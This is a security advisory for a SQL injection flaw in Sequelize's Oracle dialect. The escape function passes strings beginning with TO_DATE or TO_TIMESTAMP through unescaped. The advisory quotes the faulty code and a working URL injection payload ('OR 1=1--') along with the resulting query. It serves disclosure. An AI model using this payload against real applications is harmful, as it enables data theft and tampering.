OSV 1.4.0 · github-reviewed · 修改于 2026-08-04 04:29
发布时间
2026-08-04 04:29
GitHub 审查时间
2026-08-04 04:29
NVD 发布时间
—
源文件
advisories/github-reviewed/2026/08/GHSA-v8fg-2rw7-q452/GHSA-v8fg-2rw7-q452.json
SQL Injection is possible with strings only if dialect is set to oracle.
The vulnerability was confirmed on Sequelize v6.37.3.
The escape function defined in sql-string.js does not escape quotes if the value starts with TO_TIMESTAMP or TO_DATE.
} else if (dialect === 'oracle' && typeof val === 'string') {
if (val.startsWith('TO_TIMESTAMP') || val.startsWith('TO_DATE')) {
return val;
}
val = val.replace(/'/g, "''");
}
Suppose the application has the following code:
var result = await models.Student.findOne({
where: {
firstName: req.query.firstName
}
});
An attacker can inject arbitrary sql expressions.
http://host/path?firstName=TO_DATE('0','Y')||'' OR 1=1--
The resulted SQL will be:
SELECT ... WHERE "Student"."firstName" = TO_DATE('0','Y')||'' OR 1=1-- ORDER BY "Student"."id" OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY;
Data theft and tampering.